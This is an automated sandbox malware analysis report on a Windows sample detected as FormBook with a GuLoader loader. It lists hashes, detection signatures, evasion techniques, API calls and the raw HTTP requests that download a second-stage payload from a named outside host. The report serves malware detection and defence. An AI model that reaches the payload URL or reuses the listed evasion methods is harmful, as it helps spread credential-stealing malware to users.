Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wmKmOQ868z.exe

Overview

General Information

Sample name:wmKmOQ868z.exe
renamed because original name is a hash value
Original sample name:f392bfa146ad86308fa464a9505708645f99618d54483cbc6b746b656f26a3fb.exe
Analysis ID:1550272
MD5:f7fc33c3bcded454047a6bfaf99f1452
SHA1:a23a2448f373a4319fc0722b72595815d27c62c6
SHA256:f392bfa146ad86308fa464a9505708645f99618d54483cbc6b746b656f26a3fb
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook, GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wmKmOQ868z.exe (PID: 6184 cmdline: "C:\Users\user\Desktop\wmKmOQ868z.exe" MD5: F7FC33C3BCDED454047A6BFAF99F1452)
    • wmKmOQ868z.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\wmKmOQ868z.exe" MD5: F7FC33C3BCDED454047A6BFAF99F1452)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.3339767606.0000000000060000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2653654327.0000000003020000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T16:29:39.486829+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549704TCP
      2024-11-06T16:30:17.973333+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549756TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T16:30:26.040681+010028032702Potentially Bad Traffic192.168.2.549757162.240.106.189443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: wmKmOQ868z.exeAvira: detected
      Source: wmKmOQ868z.exeReversingLabs: Detection: 31%
      Source: Yara matchFile source: 00000004.00000002.3339767606.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: wmKmOQ868z.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 162.240.106.189:443 -> 192.168.2.5:49757 version: TLS 1.2
      Source: wmKmOQ868z.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: wmKmOQ868z.exe, 00000004.00000001.2652302474.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: wmKmOQ868z.exe, 00000004.00000003.3010655343.00000000326C6000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3008542266.000000003251B000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: wmKmOQ868z.exe, wmKmOQ868z.exe, 00000004.00000003.3010655343.00000000326C6000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3008542266.000000003251B000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: wmKmOQ868z.exe, 00000004.00000001.2652302474.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C60
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49704
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49756
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49757 -> 162.240.106.189:443
      Source: global trafficHTTP traffic detected: GET /LNRHXbp85.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: comercializadoradeinsumos.clCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /LNRHXbp85.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: comercializadoradeinsumos.clCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: comercializadoradeinsumos.cl
      Source: wmKmOQ868z.exeString found in binary or memory: http://crl.apple.com/root.crl0
      Source: wmKmOQ868z.exeString found in binary or memory: http://crl.apple.com/timestamp.crl0
      Source: wmKmOQ868z.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: wmKmOQ868z.exeString found in binary or memory: http://www.apple.com/appleca0
      Source: wmKmOQ868z.exe, 00000004.00000001.2652302474.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: wmKmOQ868z.exe, 00000004.00000001.2652302474.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: wmKmOQ868z.exe, 00000004.00000001.2652302474.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: wmKmOQ868z.exe, 00000004.00000003.3008838276.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3009015750.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3341099454.0000000002766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://comercializadoradeinsumos.cl/
      Source: wmKmOQ868z.exe, 00000004.00000002.3341033592.0000000002718000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3008838276.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3009015750.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3341099454.0000000002766000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3341017926.00000000026F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://comercializadoradeinsumos.cl/LNRHXbp85.bin
      Source: wmKmOQ868z.exe, 00000004.00000002.3341033592.0000000002718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://comercializadoradeinsumos.cl/LNRHXbp85.binOp
      Source: wmKmOQ868z.exe, 00000004.00000002.3341033592.0000000002718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://comercializadoradeinsumos.cl/LNRHXbp85.bin_p
      Source: wmKmOQ868z.exe, 00000004.00000002.3341033592.0000000002718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://comercializadoradeinsumos.cl/LNRHXbp85.binz
      Source: wmKmOQ868z.exe, 00000004.00000003.3008838276.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3009015750.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3341099454.0000000002766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://comercializadoradeinsumos.cl/X
      Source: wmKmOQ868z.exe, 00000004.00000001.2652302474.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: wmKmOQ868z.exeString found in binary or memory: https://www.apple.com/appleca/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownHTTPS traffic detected: 162.240.106.189:443 -> 192.168.2.5:49757 version: TLS 1.2

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000004.00000002.3339767606.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E35C0 NtCreateMutant,LdrInitializeThunk,4_2_328E35C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_328E2C70
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E3090 NtSetValueKey,4_2_328E3090
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E3010 NtOpenDirectoryObject,4_2_328E3010
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E39B0 NtGetContextThread,4_2_328E39B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E3D10 NtOpenProcessToken,4_2_328E3D10
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E3D70 NtOpenThread,4_2_328E3D70
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E4340 NtSetContextThread,4_2_328E4340
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E4650 NtSuspendThread,4_2_328E4650
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2AB0 NtWaitForSingleObject,4_2_328E2AB0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2AD0 NtReadFile,4_2_328E2AD0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2AF0 NtWriteFile,4_2_328E2AF0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2B80 NtQueryInformationFile,4_2_328E2B80
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2BA0 NtEnumerateValueKey,4_2_328E2BA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2BE0 NtQueryValueKey,4_2_328E2BE0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2BF0 NtAllocateVirtualMemory,4_2_328E2BF0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2B60 NtClose,4_2_328E2B60
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2E80 NtReadVirtualMemory,4_2_328E2E80
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2EA0 NtAdjustPrivilegesToken,4_2_328E2EA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2EE0 NtQueueApcThread,4_2_328E2EE0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2E30 NtWriteVirtualMemory,4_2_328E2E30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2F90 NtProtectVirtualMemory,4_2_328E2F90
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2FA0 NtQuerySection,4_2_328E2FA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2FB0 NtResumeThread,4_2_328E2FB0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2FE0 NtCreateFile,4_2_328E2FE0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2F30 NtCreateSection,4_2_328E2F30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2F60 NtCreateProcessEx,4_2_328E2F60
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2CA0 NtQueryInformationToken,4_2_328E2CA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2CC0 NtQueryVirtualMemory,4_2_328E2CC0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2CF0 NtOpenProcess,4_2_328E2CF0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2C00 NtQueryInformationProcess,4_2_328E2C00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2C60 NtCreateKey,4_2_328E2C60
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2DB0 NtEnumerateKey,4_2_328E2DB0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2DD0 NtDelayExecution,4_2_328E2DD0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2DF0 NtQuerySystemInformation,4_2_328E2DF0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2D00 NtSetInformationFile,4_2_328E2D00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2D10 NtMapViewOfSection,4_2_328E2D10
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E2D30 NtUnmapViewOfSection,4_2_328E2D30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeFile created: C:\Windows\resources\primy.iniJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_6F701BFF0_2_6F701BFF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B52A04_2_328B52A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB2C04_2_328CB2C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329512ED4_2_329512ED
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328F739A4_2_328F739A
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296132D4_2_3296132D
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289D34C4_2_3289D34C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B70C04_2_328B70C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295F0CC4_2_3295F0CC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296F0E04_2_3296F0E0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329670E94_2_329670E9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BB1B04_2_328BB1B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328E516C4_2_328E516C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3289F1724_2_3289F172
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3297B16B4_2_3297B16B
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329616CC4_2_329616CC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296F7B04_2_3296F7B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296F43F4_2_3296F43F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A14604_2_328A1460
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294D5B04_2_3294D5B0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329675714_2_32967571
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328F5AA04_2_328F5AA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32951AA34_2_32951AA3
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294DAAC4_2_3294DAAC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295DAC64_2_3295DAC6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32967A464_2_32967A46
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296FA494_2_3296FA49
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32923A6C4_2_32923A6C
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CFB804_2_328CFB80
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32925BF04_2_32925BF0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328EDBF94_2_328EDBF9
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296FB764_2_3296FB76
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B38E04_2_328B38E0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3291D8004_2_3291D800
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329459104_2_32945910
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B99504_2_328B9950
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CB9504_2_328CB950
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B9EB04_2_328B9EB0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B1F924_2_328B1F92
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296FFB14_2_3296FFB1
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296FF094_2_3296FF09
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296FCF24_2_3296FCF2
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32929C324_2_32929C32
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CFDC04_2_328CFDC0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B3D404_2_328B3D40
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32961D5A4_2_32961D5A
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32967D734_2_32967D73
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329302C04_2_329302C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329502744_2_32950274
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329703E64_2_329703E6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BE3F04_2_328BE3F0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296A3524_2_3296A352
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329420004_2_32942000
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329641A24_2_329641A2
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329701AA4_2_329701AA
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329681CC4_2_329681CC
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A01004_2_328A0100
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294A1184_2_3294A118
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329381584_2_32938158
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328CC6E04_2_328CC6E0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AC7C04_2_328AC7C0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D47504_2_328D4750
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B07704_2_328B0770
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3295E4F64_2_3295E4F6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329544204_2_32954420
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329624464_2_32962446
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_329705914_2_32970591
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B05354_2_328B0535
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AEA804_2_328AEA80
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32966BD74_2_32966BD7
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296AB404_2_3296AB40
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328968B84_2_328968B8
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328DE8F04_2_328DE8F0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BA8404_2_328BA840
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B28404_2_328B2840
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B29A04_2_328B29A0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3297A9A64_2_3297A9A6
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C69624_2_328C6962
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296CE934_2_3296CE93
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C2E904_2_328C2E90
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296EEDB4_2_3296EEDB
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3296EE264_2_3296EE26
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B0E594_2_328B0E59
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3292EFA04_2_3292EFA0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A2FC84_2_328A2FC8
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BCFE04_2_328BCFE0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32952F304_2_32952F30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328F2F284_2_328F2F28
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328D0F304_2_328D0F30
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32924F404_2_32924F40
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_32950CB54_2_32950CB5
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328A0CF24_2_328A0CF2
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328B0C004_2_328B0C00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328C8DBF4_2_328C8DBF
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328AADE04_2_328AADE0
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_328BAD004_2_328BAD00
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 4_2_3294CD1F4_2_3294CD1F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: String function: 3291EA12 appears 86 times
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: String function: 3289B970 appears 280 times
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: String function: 328F7E54 appears 102 times
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: String function: 3292F290 appears 105 times
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: String function: 328E5130 appears 58 times
      Source: wmKmOQ868z.exeStatic PE information: invalid certificate
      Source: wmKmOQ868z.exe, 00000000.00000000.2046009845.00000000007F6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamealbuestdene nondisparate.exe4 vs wmKmOQ868z.exe
      Source: wmKmOQ868z.exe, 00000004.00000000.2651761696.00000000007F6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamealbuestdene nondisparate.exe4 vs wmKmOQ868z.exe
      Source: wmKmOQ868z.exe, 00000004.00000002.3362178901.0000000032B41000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wmKmOQ868z.exe
      Source: wmKmOQ868z.exe, 00000004.00000003.3010655343.00000000327F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wmKmOQ868z.exe
      Source: wmKmOQ868z.exe, 00000004.00000003.3008542266.000000003263E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wmKmOQ868z.exe
      Source: wmKmOQ868z.exeBinary or memory string: OriginalFilenamealbuestdene nondisparate.exe4 vs wmKmOQ868z.exe
      Source: wmKmOQ868z.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal88.troj.evad.winEXE@2/12@1/1
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeFile created: C:\Users\user\imaumsJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeFile created: C:\Users\user\AppData\Local\Temp\nsgCCB6.tmpJump to behavior
      Source: wmKmOQ868z.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: wmKmOQ868z.exeReversingLabs: Detection: 31%
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeFile read: C:\Users\user\Desktop\wmKmOQ868z.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\wmKmOQ868z.exe "C:\Users\user\Desktop\wmKmOQ868z.exe"
      Source: C:\Users\user\Desktop\wmKmOQ868z.exeProcess created: C:\Users\user\Desktop\wmKmOQ868z.exe "C:\Users\user\Desktop\wmKmOQ868z.exe"
